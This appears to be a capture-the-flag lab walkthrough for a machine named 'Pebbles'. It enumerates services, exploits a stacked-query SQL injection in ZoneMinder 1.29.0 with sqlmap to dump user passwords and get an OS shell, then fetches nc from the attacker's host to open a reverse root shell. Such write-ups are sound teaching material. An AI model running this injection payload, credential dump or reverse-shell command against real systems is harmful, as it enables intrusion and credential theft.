# Pebbles ## Information Gathering ### Service Enumeration `nmapAutomator.sh -H 192.168.85.52 -t full` `nmapAutomator.sh -H 192.168.85.52 -t vulns` ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadDepA_067DRLj3O6E%2F48d97856a5ef43529a5005a82d551226.png?alt=media\&token=bf649595-06c5-4b7b-a846-88f3ed65299d) ### HTTP Port 80 ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadDi8O5CW73VW33Z75%2F80f84f8f57074fad9dc2c2947cf163aa.png?alt=media\&token=497821c6-d04c-41f8-bf8a-3834220d3773) `gobuster dir -u http://192.168.85.52 -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50` ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadDlJry0AuJLs3A0WS%2F98b508bc3513474f9551fd3d8ba51dca.png?alt=media\&token=c43158ad-fa5a-45d5-bc65-898692661643) Using a larger wordlist: `gobuster dir -u http://192.168.85.52 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -x .txt,.php --threads 100` ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadDpicgMBqpOdFlXJs%2F6bed5bc2ca774815acb95de65006c457.png?alt=media\&token=26ffeb09-f656-4433-a218-8fb410ada039) We have a ZoneMinder console (v1.29.0). ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadDtxJOCSonpaLvfch%2Fac06be358d81452596baff86d11f8300.png?alt=media\&token=54ad8e11-51d9-49aa-a253-53e8088c9135) Port 8080 contains another HTTP service. `gobuster dir -u http://192.168.85.52:8080 -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50` ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadE-GD9B8xvNqOwqvh%2F47a90d5dbb324e9c80cad5026bbf975f.png?alt=media\&token=010d3e86-b1b5-4323-8e72-dd6ab7d196be) There is a `hello.php`. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadE1x9nNhNTR5nMNzJ%2Fc769faeb21b0474384c91eabb8f7b6bc.png?alt=media\&token=10686ad0-22a4-4475-adee-d76cb733f2cc) ## Exploitation From the ZoneMinder version (v1.29.0) above, we find that it is vulnerable to SQL injection. It appears that the `limit` parameter is vulnerable to stacked queries. Using the following POST payload: `view=request&request=log&task=query&limit=100;SELECT SLEEP(5)#&minTime=5` We can make the server sleep for 5 seconds. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadE5EP9YhCP2MKcU9M%2Fc964409c24e74e04a20dd3d2f610147b.png?alt=media\&token=238ea2b9-8008-4487-90a7-1ec4dccd0f09) This is a blind SQL injection (True = sleep, False = no sleep). We can automate the blind SQL injection using `sqlmap`. `sqlmap http://192.168.133.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -D zm --tables --threads 5` ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadEB1vNACiOrPuXUwY%2F3eecdd45a2704cddaaa5fdb4dc863094.png?alt=media\&token=bb5a8435-99d4-435a-8c81-c14b4455c24b) `sqlmap http://192.168.133.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" -D zm -T Users -C Username,Password --dump --threads 5` ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadEDlGYS35JFrk381l%2Fdb401a0a624748cfb5e3a09da1caded7.png?alt=media\&token=c26f89de-cdd4-42bf-95c8-4e75c6eb479d) We can achieve RCE using the `--os-shell` option. `sqlmap http://192.168.133.52/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" --os-shell` ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadEHGWyq-pqCjDgtTc%2F0b50a04b17b94ea797c059370605c084.png?alt=media\&token=f642aec1-7cbc-46ef-a079-de860502ed39) ``` wget "http://192.168.49.133/nc" -O /tmp/nc chmod +x /tmp/nc /tmp/nc -e /bin/bash 192.168.49.133 3305 ``` **Two things were important here: the port 3305, and the location of the nc binary.** On our listening machine, we get a root shell. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadEaAAa8zt1Tp5c-sX%2F72e0d008acfc43e79d022509fea3aaa0.png?alt=media\&token=d4070b1d-fbc5-47ca-9c5c-ba4d969a28d9) Upgrade to an interactive shell: `python -c 'import pty;pty.spawn("/bin/bash")'` Proof: ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadEeMEQ-3LZ6mjnskd%2F86b04a6d492b4824bb14e8e7c57119d5.png?alt=media\&token=7d9c22b5-7a74-498d-9250-b12c660c9d61)